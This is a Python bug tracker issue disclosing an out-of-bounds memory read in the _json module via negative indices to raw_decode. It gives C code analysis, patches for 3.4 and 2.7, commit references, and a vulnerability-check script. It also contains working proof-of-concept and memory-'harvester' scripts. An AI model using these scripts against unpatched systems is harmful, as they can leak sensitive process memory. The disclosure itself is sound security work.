Movatterモバイル変換


[0]ホーム

URL:


homepage

Issue21529

This issue trackerhas been migrated toGitHub, and is currentlyread-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

classification
Title:JSON module: reading arbitrary process memory
Type:securityStage:
Components:Extension Modules, Library (Lib)Versions:Python 3.1, Python 3.2, Python 3.3, Python 3.4, Python 3.5, Python 2.7
process
Status:closedResolution:fixed
Dependencies:Superseder:
Assigned To:Nosy List: benjamin.peterson, jcea
Priority:criticalKeywords:

Created on2014-05-19 00:40 bybenjamin.peterson, last changed2022-04-11 14:58 byadmin. This issue is nowclosed.

Messages (3)
msg218771 -(view)Author: Benjamin Peterson (benjamin.peterson)*(Python committer)Date: 2014-05-19 00:40
(Copy paste from the security list)Python 2 and 3 are susceptible to arbitrary process memory reading bya user or adversary due to a bug in the _json module caused byinsufficient bounds checking.The sole prerequisites of this attack are that the attacker is able tocontrol or influence the two parameters of the default scanstringfunction: the string to be decoded and the index.The bug is caused by allowing the user to supply a negative indexvalue. The index value is then used directly as an index to an arrayin the C code; internally the address of the array and its index areadded to each other in order to yield the address of the value that isdesired. However, by supplying a negative index value and adding thisto the address of the array, the processor's register value wrapsaround and the calculated value will point to a position in memorywhich isn't within the bounds of the supplied string, causing thefunction to access other parts of the process memory.Let me clarify:This is Python-3.4.0/Modules/_json.c:1035 static PyObject *1036 scanner_call(PyObject *self, PyObject *args, PyObject *kwds)1037 {1038     /* Python callable interface to scan_once_{str,unicode} */1039     PyObject *pystr;1040     PyObject *rval;1041     Py_ssize_t idx;1042     Py_ssize_t next_idx = -1;1043     static char *kwlist[] = {"string", "idx", NULL};1044     PyScannerObject *s;1045     assert(PyScanner_Check(self));1046     s = (PyScannerObject *)self;1047     if (!PyArg_ParseTupleAndKeywords(args, kwds, "On:scan_once",kwlist, &pystr, &idx))1048         return NULL;10491050     if (PyUnicode_Check(pystr)) {1051         rval = scan_once_unicode(s, pystr, idx, &next_idx);1052     }1053     else {1054         PyErr_Format(PyExc_TypeError,1055                  "first argument must be a string, not %.80s",1056                  Py_TYPE(pystr)->tp_name);1057         return NULL;1058     }1059     PyDict_Clear(s->memo);1060     if (rval == NULL)1061         return NULL;1062     return _build_rval_index_tuple(rval, next_idx);1063 }As you can see on line 1047, ParseTuple takes an 'n' as an argumentfor 'end', which, as can be learned from this page (https://docs.python.org/3/c-api/arg.html ), means:        n (int) [Py_ssize_t]            Convert a Python integer to a C Py_ssize_t.This means it accepts a SIGNED integer value, thus allowing a negativevalue to be supplied as the 'end' parameter.Then onto scanstring_unicode_once to which execution gets transferredthrough line 1051 of the code above.922  static PyObject *923  scan_once_unicode(PyScannerObject *s, PyObject *pystr, Py_ssize_tidx, Py_ssize_t *next_idx_ptr)924  {925      /* Read one JSON term (of any kind) from PyUnicode pystr.926      idx is the index of the first character of the term927      *next_idx_ptr is a return-by-reference index to the firstcharacter after928          the number.929930      Returns a new PyObject representation of the term.931      */932      PyObject *res;933      void *str;934      int kind;935      Py_ssize_t length;936937      if (PyUnicode_READY(pystr) == -1)938          return NULL;939940      str = PyUnicode_DATA(pystr);941      kind = PyUnicode_KIND(pystr);942      length = PyUnicode_GET_LENGTH(pystr);943944      if (idx >= length) {945          raise_stop_iteration(idx);946          return NULL;947      }Here we see that 'length' is set to the length of the stringparameter. This will always be a positive value. On line 945 it ischecked whether idx is equal or higher than length; this can never betrue in the case of a negative index value.949      switch (PyUnicode_READ(kind, str, idx)) {PyUnicode_READ is defined as follows ( inPython-3.4.0/Include/unicodeobject.h ):516  /* Read a code point from the string's canonical representation.  No checks517     or ready calls are performed. */518  #define PyUnicode_READ(kind, data, index) \519      ((Py_UCS4) \520      ((kind) == PyUnicode_1BYTE_KIND ? \521          ((const Py_UCS1 *)(data))[(index)] : \522          ((kind) == PyUnicode_2BYTE_KIND ? \523              ((const Py_UCS2 *)(data))[(index)] : \524              ((const Py_UCS4 *)(data))[(index)] \525          ) \526      ))Here we can see that index, which is negative in our example, is usedas an array index. Since it is negative, it will internally wraparound and point to an address BELOW the address of 'data'.So, if a certain negative value (such as -0x7FFFFFFF) is supplied anddata[index] will effectively point to an invalid or read-protectedpage in memory, the Python executable will segfault.But there's more. Instead of making it point to an invalid page, let'smake it point to something valid:1    from json import JSONDecoder2    j = JSONDecoder()3    a = "99448866"4    b = "88445522"5    diff = id(a) - id(b)6    print("Difference is " + hex(diff))7    print j.raw_decode(b)8    print j.raw_decode(b, diff)Output of this script is:Difference is -0x30(88445522, 8)(99448866, -40)The difference between the address of 'a' and the address of 'b' iscalculated and supplied as an index to the raw_decode function.Internally the address wraps around and we get to see the contents of'a' while having supplied 'b' as a parameter.We can use this harvester to scan memory for valid JSON strings:1    from json import JSONDecoder2    j = JSONDecoder()3    a = "x" * 10004    for x in range(0, 600000):5        try:6            print j.raw_decode(a, 0 - x)7        except:8            passThere is one drawback, however. We cannot decode strings in this manner because:296  static PyObject *297  scanstring_unicode(PyObject *pystr, Py_ssize_t end, int strict,Py_ssize_t *next_end_ptr)298  {299      /* Read the JSON string from PyUnicode pystr.300      end is the index of the first character after the quote.301      if strict is zero then literal control characters are allowed302      *next_end_ptr is a return-by-reference index of the character303          after the end quote304305      Return value is a new PyUnicode306      */307      PyObject *rval = NULL;308      Py_ssize_t len;309      Py_ssize_t begin = end - 1;310      Py_ssize_t next /* = begin */;311      const void *buf;312      int kind;313      PyObject *chunks = NULL;314      PyObject *chunk = NULL;315316      if (PyUnicode_READY(pystr) == -1)317          return 0;318319      len = PyUnicode_GET_LENGTH(pystr);320      buf = PyUnicode_DATA(pystr);321      kind = PyUnicode_KIND(pystr);322323      if (end < 0 || len < end) {324          PyErr_SetString(PyExc_ValueError, "end is out of bounds");325          goto bail;this code actually performs a bounds check by asserting that end(which is our index) isn't negative.However, I succesfully ran harvesting tests that could extractJSON-encoded arrays of numerical values (such as [10, 20, 40, 70] )from the process memory without any problem or difficulty.Given the ubiquity of JSON parsing in Python applications and thelimited amount of prequisites and conditions under which this bug canbe exploited, it is evident that this issue could have serioussecurity implications in some cases.Here is a patch for 3.4.0:--- _json_old.c    2014-04-12 17:47:08.749012372 +0200+++ _json.c    2014-04-12 17:44:52.253011645 +0200@@ -941,7 +941,7 @@     kind = PyUnicode_KIND(pystr);     length = PyUnicode_GET_LENGTH(pystr);-    if (idx >= length) {+    if ( idx < 0 || idx >= length) {         raise_stop_iteration(idx);         return NULL;     }And here is a patch for 2.7.6:--- _json_old.c    2014-04-12 17:57:14.365015601 +0200+++ _json.c    2014-04-12 18:04:25.149017898 +0200@@ -1491,7 +1491,7 @@     PyObject *res;     char *str = PyString_AS_STRING(pystr);     Py_ssize_t length = PyString_GET_SIZE(pystr);-    if (idx >= length) {+    if ( idx < 0 || idx >= length) {         PyErr_SetNone(PyExc_StopIteration);         return NULL;     }@@ -1578,7 +1578,7 @@     PyObject *res;     Py_UNICODE *str = PyUnicode_AS_UNICODE(pystr);     Py_ssize_t length = PyUnicode_GET_SIZE(pystr);-    if (idx >= length) {+    if ( idx < 0 || idx >= length) {         PyErr_SetNone(PyExc_StopIteration);         return NULL;     }Here is a script that checks whether the Python binary that executesit is vulnerable:1    from json import JSONDecoder2    j = JSONDecoder()34    a = '128931233'5    b = "472389423"67    if id(a) < id(b):8        x = a9        y = b10   else:11       x = b12       y = a1314   diff = id(x) - id(y)1516   try:17       j.raw_decode(y, diff)18       print("Vulnerable")19   except:20       print("Not vulnerable")Please let me know what your thoughts on this are and when you thinkit will be fixed. Thank you.Note: I haven't shared this vulnerability with anyone and I won't doso until the bug has been fixed.Guido Vranken
msg218772 -(view)Author: Benjamin Peterson (benjamin.peterson)*(Python committer)Date: 2014-05-19 00:42
http://hg.python.org/cpython/rev/50c07ed1743dhttp://hg.python.org/cpython/rev/a8facac493ef
msg218807 -(view)Author: Jesús Cea Avión (jcea)*(Python committer)Date: 2014-05-19 18:54
Fixed also in 3.2 (b9913eb96643), 3.3 (4f15bd1ab28f), 3.4 (7b95540ced5c) and 3.5 (3a414c709f1f).
History
DateUserActionArgs
2022-04-11 14:58:03adminsetgithub: 65728
2014-05-19 18:54:21jceasetmessages: +msg218807
2014-05-19 18:46:14jceasetnosy: +jcea
2014-05-19 00:42:12benjamin.petersonsetstatus: open -> closed
resolution: fixed
messages: +msg218772
2014-05-19 00:40:59benjamin.petersoncreate
Supported byThe Python Software Foundation,
Powered byRoundup
Copyright © 1990-2022,Python Software Foundation
Legal Statements

[8]ページ先頭

©2009-2026 Movatter.jp